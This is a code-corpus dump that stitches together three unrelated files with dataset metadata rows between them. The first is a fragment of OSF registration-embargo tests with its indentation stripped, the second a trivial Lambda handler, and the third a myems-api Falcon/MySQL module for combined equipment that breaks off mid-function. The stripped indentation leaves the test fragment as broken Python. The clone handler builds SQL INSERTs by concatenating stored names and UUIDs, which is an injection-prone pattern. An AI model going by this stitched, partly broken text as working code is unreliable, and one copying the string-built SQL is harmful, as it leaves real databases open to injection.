expect_errors=True
)
self.registration.embargo.reload()
assert_true(self.registration.pending_embargo)
assert_equal(res.status_code, 400)
def test_GET_disapprove_with_wrong_admins_token_returns_HTTPBad_Request(self):
admin2 = UserFactory()
self.registration.contributors.append(admin2)
self.registration.add_permission(admin2, 'admin', save=True)
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
self.registration.save()
assert_true(self.registration.pending_embargo)
wrong_disapproval_token = self.registration.embargo.approval_state[admin2._id]['disapproval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=wrong_disapproval_token),
auth=self.user.auth,
expect_errors=True
)
assert_true(self.registration.pending_embargo)
assert_equal(res.status_code, 400)
def test_GET_disapprove_with_valid_token_returns_redirect_to_parent(self):
project = ProjectFactory(creator=self.user)
registration = RegistrationFactory(project=project)
registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10)
)
registration.save()
assert_true(registration.pending_embargo)
disapproval_token = registration.embargo.approval_state[self.user._id]['disapproval_token']
res = self.app.get(
registration.web_url_for('node_registration_embargo_disapprove', token=disapproval_token),
auth=self.user.auth,
)
registration.embargo.reload()
assert_equal(registration.embargo.state, Embargo.CANCELLED)
assert_false(registration.embargo_end_date)
assert_false(registration.pending_embargo)
assert_equal(res.status_code, 302)
assert_true(project._id in res.location)
def test_GET_disapprove_for_existing_registration_with_valid_token_returns_redirect_to_registration(self):
self.registration.embargo_registration(
self.user,
datetime.datetime.utcnow() + datetime.timedelta(days=10),
for_existing_registration=True
)
self.registration.save()
assert_true(self.registration.pending_embargo)
disapproval_token = self.registration.embargo.approval_state[self.user._id]['disapproval_token']
res = self.app.get(
self.registration.web_url_for('node_registration_embargo_disapprove', token=disapproval_token),
auth=self.user.auth,
)
self.registration.embargo.reload()
assert_equal(self.registration.embargo.state, Embargo.CANCELLED)
assert_false(self.registration.embargo_end_date)
assert_false(self.registration.pending_embargo)
assert_equal(res.status_code, 302)
assert_true(self.registration._id in res.location)
class RegistrationEmbargoViewsTestCase(OsfTestCase):
def setUp(self):
super(RegistrationEmbargoViewsTestCase, self).setUp()
ensure_schemas()
self.user = AuthUserFactory()
self.project = ProjectFactory(creator=self.user)
self.registration = RegistrationFactory(project=self.project, creator=self.user)
current_month = datetime.datetime.now().strftime("%B")
current_year = datetime.datetime.now().strftime("%Y")
self.valid_make_public_payload = json.dumps({
u'embargoEndDate': u'Fri, 01, {month} {year} 00:00:00 GMT'.format(
month=current_month,
year=current_year
),
u'registrationChoice': 'immediate',
u'summary': unicode(fake.sentence())
})
valid_date = datetime.datetime.now() + datetime.timedelta(days=180)
self.valid_embargo_payload = json.dumps({
u'embargoEndDate': unicode(valid_date.strftime('%a, %d, %B %Y %H:%M:%S')) + u' GMT',
u'registrationChoice': 'embargo',
u'summary': unicode(fake.sentence())
})
self.invalid_embargo_date_payload = json.dumps({
u'embargoEndDate': u"Thu, 01 {month} {year} 05:00:00 GMT".format(
month=current_month,
year=str(int(current_year)-1)
),
u'registrationChoice': 'embargo',
u'summary': unicode(fake.sentence())
})
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_POST_register_make_public_immediately_creates_public_registration(self, mock_enqueue):
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.valid_make_public_payload,
content_type='application/json',
auth=self.user.auth
)
assert_equal(res.status_code, 201)
registration = Node.find().sort('-registered_date')[0]
assert_true(registration.is_registration)
assert_true(registration.is_public)
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_POST_register_make_public_immediately_makes_children_public(self, mock_enqueue):
component = NodeFactory(
creator=self.user,
parent=self.project,
title='Component'
)
subproject = ProjectFactory(
creator=self.user,
parent=self.project,
title='Subproject'
)
subproject_component = NodeFactory(
creator=self.user,
parent=subproject,
title='Subcomponent'
)
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.valid_make_public_payload,
content_type='application/json',
auth=self.user.auth
)
self.project.reload()
# Last node directly registered from self.project
registration = Node.load(self.project.node__registrations[-1])
assert_true(registration.is_public)
for node in registration.get_descendants_recursive():
assert_true(node.is_registration)
assert_true(node.is_public)
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_POST_register_embargo_is_not_public(self, mock_enqueue):
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.valid_embargo_payload,
content_type='application/json',
auth=self.user.auth
)
assert_equal(res.status_code, 201)
registration = Node.find().sort('-registered_date')[0]
assert_true(registration.is_registration)
assert_false(registration.is_public)
assert_true(registration.pending_registration)
assert_is_not_none(registration.embargo)
@mock.patch('framework.tasks.handlers.enqueue_task')
def test_POST_invalid_embargo_end_date_returns_HTTPBad_Request(self, mock_enqueue):
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.invalid_embargo_date_payload,
content_type='application/json',
auth=self.user.auth,
expect_errors=True
)
assert_equal(res.status_code, 400)
@mock.patch('framework.tasks.handlers.enqueue_task')
    def test_valid_POST_embargo_adds_to_parent_projects_log(self, mock_enqueue):
initial_project_logs = len(self.project.logs)
res = self.app.post(
self.project.api_url_for('node_register_template_page_post', template=u'Open-Ended_Registration'),
self.valid_embargo_payload,
content_type='application/json',
auth=self.user.auth
)
self.project.reload()
# Logs: Created, registered, embargo initiated
assert_equal(len(self.project.logs), initial_project_logs + 1)
| 1.984375 | 2 |
tests/Firefly.PSCloudFormation.Tests.Unit/Resources/LambdaDependencies/PythonLambda/Lambda/my_lambda.py | fireflycons/PSCloudFormation | 3 | 12759582 | <reponame>fireflycons/PSCloudFormation<gh_stars>1-10
def handler(event: dict, context, debug_var=1, **kwargs) -> None:
print('hi')
| 1.429688 | 1 |
myems-api/core/combinedequipment.py | FanZhen2002/myems | 2 | 12759583 | import falcon
import simplejson as json
import mysql.connector
import config
import uuid
from core.useractivity import user_logger, access_control
class CombinedEquipmentCollection:
@staticmethod
def __init__():
""" Initializes CombinedEquipmentCollection"""
pass
@staticmethod
def on_options(req, resp):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp):
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
query = (" SELECT id, name, uuid "
" FROM tbl_cost_centers ")
cursor.execute(query)
rows_cost_centers = cursor.fetchall()
cost_center_dict = dict()
if rows_cost_centers is not None and len(rows_cost_centers) > 0:
for row in rows_cost_centers:
cost_center_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid, "
" is_input_counted, is_output_counted, "
" cost_center_id, description "
" FROM tbl_combined_equipments "
" ORDER BY id ")
cursor.execute(query)
rows_combined_equipments = cursor.fetchall()
result = list()
if rows_combined_equipments is not None and len(rows_combined_equipments) > 0:
for row in rows_combined_equipments:
cost_center = cost_center_dict.get(row['cost_center_id'], None)
meta_result = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid'],
"is_input_counted": bool(row['is_input_counted']),
"is_output_counted": bool(row['is_output_counted']),
"cost_center": cost_center,
"description": row['description'],
"qrcode": 'combinedequipment:' + row['uuid']}
result.append(meta_result)
cursor.close()
cnx.disconnect()
resp.text = json.dumps(result)
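    # Illustrative response body for the GET handler above (all values are
    # made up; the shape follows the meta_result construction):
    #
    #   [{"id": 1, "name": "Chiller Plant", "uuid": "...",
    #     "is_input_counted": true, "is_output_counted": false,
    #     "cost_center": {"id": 1, "name": "Default", "uuid": "..."},
    #     "description": null, "qrcode": "combinedequipment:..."}]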
@staticmethod
@user_logger
def on_post(req, resp):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR', description=str(ex))
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_NAME')
name = str.strip(new_values['data']['name'])
if 'is_input_counted' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_input_counted'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_INPUT_COUNTED_VALUE')
is_input_counted = new_values['data']['is_input_counted']
if 'is_output_counted' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output_counted'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_COUNTED_VALUE')
is_output_counted = new_values['data']['is_output_counted']
if 'cost_center_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['cost_center_id'], int) or \
new_values['data']['cost_center_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COST_CENTER_ID')
cost_center_id = new_values['data']['cost_center_id']
if 'description' in new_values['data'].keys() and \
new_values['data']['description'] is not None and \
len(str(new_values['data']['description'])) > 0:
description = str.strip(new_values['data']['description'])
else:
description = None
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE name = %s ", (name,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.BAD_REQUEST',
description='API.COMBINED_EQUIPMENT_NAME_IS_ALREADY_IN_USE')
if cost_center_id is not None:
cursor.execute(" SELECT name "
" FROM tbl_cost_centers "
" WHERE id = %s ",
(new_values['data']['cost_center_id'],))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COST_CENTER_NOT_FOUND')
add_values = (" INSERT INTO tbl_combined_equipments "
" (name, uuid, is_input_counted, is_output_counted, "
" cost_center_id, description) "
" VALUES (%s, %s, %s, %s, %s, %s) ")
cursor.execute(add_values, (name,
str(uuid.uuid4()),
is_input_counted,
is_output_counted,
cost_center_id,
description))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(new_id)
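# Illustrative request payload for the POST handler above (a sketch inferred
# from the validation logic; the field values are made up):
#
#   POST /combinedequipments
#   {"data": {"name": "Chiller Plant",
#             "is_input_counted": true,
#             "is_output_counted": false,
#             "cost_center_id": 1,
#             "description": "chillers and pumps"}}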
class CombinedEquipmentItem:
@staticmethod
def __init__():
"""Initializes CombinedEquipmentItem"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
query = (" SELECT id, name, uuid "
" FROM tbl_cost_centers ")
cursor.execute(query)
rows_cost_centers = cursor.fetchall()
cost_center_dict = dict()
if rows_cost_centers is not None and len(rows_cost_centers) > 0:
for row in rows_cost_centers:
cost_center_dict[row['id']] = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid, "
" is_input_counted, is_output_counted, "
" cost_center_id, description "
" FROM tbl_combined_equipments "
" WHERE id = %s ")
cursor.execute(query, (id_,))
row = cursor.fetchone()
cursor.close()
cnx.disconnect()
if row is None:
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
else:
cost_center = cost_center_dict.get(row['cost_center_id'], None)
meta_result = {"id": row['id'],
"name": row['name'],
"uuid": row['uuid'],
"is_input_counted": bool(row['is_input_counted']),
"is_output_counted": bool(row['is_output_counted']),
"cost_center": cost_center,
"description": row['description'],
"qrcode": 'combinedequipment:' + row['uuid']}
resp.text = json.dumps(meta_result)
@staticmethod
@user_logger
def on_delete(req, resp, id_):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
# check relation with space
cursor.execute(" SELECT space_id "
" FROM tbl_spaces_combined_equipments "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_combined_equipments = cursor.fetchall()
if rows_combined_equipments is not None and len(rows_combined_equipments) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_SPACES')
# check relation with meter
cursor.execute(" SELECT meter_id "
" FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_meters = cursor.fetchall()
if rows_meters is not None and len(rows_meters) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_METER')
# check relation with offline meter
cursor.execute(" SELECT offline_meter_id "
" FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_offline_meters = cursor.fetchall()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_OFFLINE_METER')
# check relation with virtual meter
cursor.execute(" SELECT virtual_meter_id "
" FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_virtual_meters = cursor.fetchall()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400,
title='API.BAD_REQUEST',
description='API.THERE_IS_RELATION_WITH_VIRTUAL_METER')
# delete all associated parameters
cursor.execute(" DELETE FROM tbl_combined_equipments_parameters WHERE combined_equipment_id = %s ", (id_,))
cnx.commit()
cursor.execute(" DELETE FROM tbl_combined_equipments WHERE id = %s ", (id_,))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
@staticmethod
@user_logger
def on_put(req, resp, id_):
"""Handles PUT requests"""
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=str(ex))
new_values = json.loads(raw_json)
if 'name' not in new_values['data'].keys() or \
not isinstance(new_values['data']['name'], str) or \
len(str.strip(new_values['data']['name'])) == 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_NAME')
name = str.strip(new_values['data']['name'])
if 'is_input_counted' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_input_counted'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_INPUT_COUNTED_VALUE')
is_input_counted = new_values['data']['is_input_counted']
if 'is_output_counted' not in new_values['data'].keys() or \
not isinstance(new_values['data']['is_output_counted'], bool):
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_IS_OUTPUT_COUNTED_VALUE')
is_output_counted = new_values['data']['is_output_counted']
if 'cost_center_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['cost_center_id'], int) or \
new_values['data']['cost_center_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COST_CENTER_ID')
cost_center_id = new_values['data']['cost_center_id']
if 'description' in new_values['data'].keys() and \
new_values['data']['description'] is not None and \
len(str(new_values['data']['description'])) > 0:
description = str.strip(new_values['data']['description'])
else:
description = None
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE name = %s AND id != %s ", (name, id_))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.BAD_REQUEST',
description='API.COMBINED_EQUIPMENT_NAME_IS_ALREADY_IN_USE')
cursor.execute(" SELECT name "
" FROM tbl_cost_centers "
" WHERE id = %s ",
(new_values['data']['cost_center_id'],))
row = cursor.fetchone()
if row is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COST_CENTER_NOT_FOUND')
update_row = (" UPDATE tbl_combined_equipments "
" SET name = %s, is_input_counted = %s, is_output_counted = %s, "
" cost_center_id = %s, description = %s "
" WHERE id = %s ")
cursor.execute(update_row, (name,
is_input_counted,
is_output_counted,
cost_center_id,
description,
id_))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_200
# Clone a Combined Equipment
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles PUT requests"""
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=str(ex))
new_values = json.loads(raw_json)
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT name, is_input_counted, is_output_counted, "
" cost_center_id, description "
" FROM tbl_combined_equipments "
" WHERE id = %s ")
cursor.execute(query, (id_,))
row = cursor.fetchone()
if row is None:
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
else:
add_values = (" INSERT INTO tbl_combined_equipments "
" (name, uuid, is_input_counted, is_output_counted, "
" cost_center_id, description) "
" VALUES (%s, %s, %s, %s, %s, %s) ")
cursor.execute(add_values, (row['name'] + ' Copy',
str(uuid.uuid4()),
row['is_input_counted'],
row['is_output_counted'],
row['cost_center_id'],
row['description']))
new_id = cursor.lastrowid
cnx.commit()
# clone relation with meter
cursor.execute(" SELECT meter_id, is_output "
" FROM tbl_combined_equipments_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_meters = cursor.fetchall()
if rows_meters is not None and len(rows_meters) > 0:
add_values = (" INSERT INTO tbl_combined_equipments_meters (combined_equipment_id, meter_id, is_output) "
" VALUES ")
for row in rows_meters:
add_values += " (" + str(new_id) + ","
add_values += str(row['meter_id']) + ","
add_values += str(bool(row['is_output'])) + "), "
# trim ", " at the end of string and then execute
cursor.execute(add_values[:-2])
cnx.commit()
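            # NOTE (sketch, not part of the original code path): this string-built
            # bulk INSERT -- and the similar ones below for offline meters, virtual
            # meters and parameters -- could also be written as a parameterized
            # executemany, which avoids manual quoting of values:
            #
            #     cursor.executemany(" INSERT INTO tbl_combined_equipments_meters "
            #                        " (combined_equipment_id, meter_id, is_output) "
            #                        " VALUES (%s, %s, %s) ",
            #                        [(new_id, r['meter_id'], bool(r['is_output']))
            #                         for r in rows_meters])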
# clone relation with offline meter
cursor.execute(" SELECT offline_meter_id, is_output "
" FROM tbl_combined_equipments_offline_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_offline_meters = cursor.fetchall()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
add_values = (" INSERT INTO tbl_combined_equipments_offline_meters "
" (combined_equipment_id, offline_meter_id, is_output) "
" VALUES ")
for row in rows_offline_meters:
add_values += " (" + str(new_id) + ","
add_values += "'" + str(row['offline_meter_id']) + "',"
add_values += str(bool(row['is_output'])) + "), "
# trim ", " at the end of string and then execute
cursor.execute(add_values[:-2])
cnx.commit()
# clone relation with virtual meter
cursor.execute(" SELECT virtual_meter_id, is_output "
" FROM tbl_combined_equipments_virtual_meters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_virtual_meters = cursor.fetchall()
if rows_virtual_meters is not None and len(rows_virtual_meters) > 0:
add_values = (" INSERT INTO tbl_combined_equipments_virtual_meters "
" (combined_equipment_id, virtual_meter_id, is_output) "
" VALUES ")
for row in rows_virtual_meters:
add_values += " (" + str(new_id) + ","
add_values += str(row['virtual_meter_id']) + ","
add_values += str(bool(row['is_output'])) + "), "
# trim ", " at the end of string and then execute
cursor.execute(add_values[:-2])
cnx.commit()
# clone parameters
cursor.execute(" SELECT name, parameter_type, constant, point_id, numerator_meter_uuid, denominator_meter_uuid "
" FROM tbl_combined_equipments_parameters "
" WHERE combined_equipment_id = %s ",
(id_,))
rows_parameters = cursor.fetchall()
if rows_parameters is not None and len(rows_parameters) > 0:
add_values = (" INSERT INTO tbl_combined_equipments_parameters"
" (combined_equipment_id, name, parameter_type, constant, point_id, "
" numerator_meter_uuid, denominator_meter_uuid) "
" VALUES ")
for row in rows_parameters:
add_values += " (" + str(new_id) + ","
add_values += "'" + str(row['name']) + "',"
add_values += "'" + str(row['parameter_type']) + "',"
if row['constant'] is not None:
add_values += "'" + str(row['constant']) + "',"
else:
add_values += "null, "
if row['point_id'] is not None:
add_values += str(row['point_id']) + ","
else:
add_values += "null, "
if row['numerator_meter_uuid'] is not None:
add_values += "'" + row['numerator_meter_uuid'] + "',"
else:
add_values += "null, "
if row['denominator_meter_uuid'] is not None:
add_values += "'" + row['denominator_meter_uuid'] + "'), "
else:
add_values += "null), "
# trim ", " at the end of string and then execute
cursor.execute(add_values[:-2])
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(new_id)
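    # Example client call for the clone handler above (illustrative; host, port
    # and authentication headers are assumptions that depend on the deployment):
    #     curl -X POST http://127.0.0.1:8000/combinedequipments/1 \
    #          -H "User-UUID: <uuid>" -H "Token: <token>"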
class CombinedEquipmentEquipmentCollection:
@staticmethod
def __init__():
"""Initializes CombinedEquipmentEquipmentCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT e.id, e.name, e.uuid "
" FROM tbl_combined_equipments c, tbl_combined_equipments_equipments ce, tbl_equipments e "
" WHERE ce.combined_equipment_id = c.id AND e.id = ce.equipment_id AND c.id = %s "
" ORDER BY e.id ")
cursor.execute(query, (id_,))
rows = cursor.fetchall()
result = list()
if rows is not None and len(rows) > 0:
for row in rows:
meta_result = {"id": row[0], "name": row[1], "uuid": row[2]}
result.append(meta_result)
        cursor.close()
        cnx.disconnect()
        resp.text = json.dumps(result)
@staticmethod
@user_logger
def on_post(req, resp, id_):
"""Handles POST requests"""
access_control(req)
try:
raw_json = req.stream.read().decode('utf-8')
except Exception as ex:
            raise falcon.HTTPError(falcon.HTTP_400, title='API.EXCEPTION', description=str(ex))
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
new_values = json.loads(raw_json)
if 'equipment_id' not in new_values['data'].keys() or \
not isinstance(new_values['data']['equipment_id'], int) or \
new_values['data']['equipment_id'] <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EQUIPMENT_ID')
equipment_id = new_values['data']['equipment_id']
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" from tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_equipments "
" WHERE id = %s ", (equipment_id,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.EQUIPMENT_NOT_FOUND')
query = (" SELECT id "
" FROM tbl_combined_equipments_equipments "
" WHERE combined_equipment_id = %s AND equipment_id = %s")
cursor.execute(query, (id_, equipment_id,))
if cursor.fetchone() is not None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_400, title='API.ERROR',
description='API.COMBINED_EQUIPMENT_EQUIPMENT_RELATION_EXISTS')
add_row = (" INSERT INTO tbl_combined_equipments_equipments (combined_equipment_id, equipment_id) "
" VALUES (%s, %s) ")
cursor.execute(add_row, (id_, equipment_id,))
new_id = cursor.lastrowid
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_201
resp.location = '/combinedequipments/' + str(id_) + '/equipments/' + str(equipment_id)
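    # Example request body for the POST handler above (illustrative):
    #     {"data": {"equipment_id": 3}}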
class CombinedEquipmentEquipmentItem:
@staticmethod
def __init__():
"""Initializes CombinedEquipmentEquipmentItem"""
pass
@staticmethod
def on_options(req, resp, id_, eid):
resp.status = falcon.HTTP_200
@staticmethod
@user_logger
def on_delete(req, resp, id_, eid):
access_control(req)
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
if not eid.isdigit() or int(eid) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor()
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT name "
" FROM tbl_equipments "
" WHERE id = %s ", (eid,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.EQUIPMENT_NOT_FOUND')
cursor.execute(" SELECT id "
" FROM tbl_combined_equipments_equipments "
" WHERE combined_equipment_id = %s AND equipment_id = %s ", (id_, eid))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_EQUIPMENT_RELATION_NOT_FOUND')
cursor.execute(" DELETE FROM tbl_combined_equipments_equipments "
" WHERE combined_equipment_id = %s AND equipment_id = %s ", (id_, eid))
cnx.commit()
cursor.close()
cnx.disconnect()
resp.status = falcon.HTTP_204
class CombinedEquipmentParameterCollection:
@staticmethod
def __init__():
"""Initializes CombinedEquipmentParameterCollection"""
pass
@staticmethod
def on_options(req, resp, id_):
resp.status = falcon.HTTP_200
@staticmethod
def on_get(req, resp, id_):
if not id_.isdigit() or int(id_) <= 0:
raise falcon.HTTPError(falcon.HTTP_400, title='API.BAD_REQUEST',
description='API.INVALID_COMBINED_EQUIPMENT_ID')
cnx = mysql.connector.connect(**config.myems_system_db)
cursor = cnx.cursor(dictionary=True)
cursor.execute(" SELECT name "
" FROM tbl_combined_equipments "
" WHERE id = %s ", (id_,))
if cursor.fetchone() is None:
cursor.close()
cnx.disconnect()
raise falcon.HTTPError(falcon.HTTP_404, title='API.NOT_FOUND',
description='API.COMBINED_EQUIPMENT_NOT_FOUND')
query = (" SELECT id, name "
" FROM tbl_points ")
cursor.execute(query)
rows_points = cursor.fetchall()
point_dict = dict()
if rows_points is not None and len(rows_points) > 0:
for row in rows_points:
point_dict[row['id']] = {"id": row['id'],
"name": row['name']}
query = (" SELECT id, name, uuid "
" FROM tbl_meters ")
cursor.execute(query)
rows_meters = cursor.fetchall()
meter_dict = dict()
if rows_meters is not None and len(rows_meters) > 0:
for row in rows_meters:
meter_dict[row['uuid']] = {"type": 'meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_offline_meters ")
cursor.execute(query)
rows_offline_meters = cursor.fetchall()
offline_meter_dict = dict()
if rows_offline_meters is not None and len(rows_offline_meters) > 0:
for row in rows_offline_meters:
offline_meter_dict[row['uuid']] = {"type": 'offline_meter',
"id": row['id'],
"name": row['name'],
"uuid": row['uuid']}
query = (" SELECT id, name, uuid "
" FROM tbl_virtual_meters ")
cursor.execute(query)
rows_virtual_meters = cursor.fetchall()
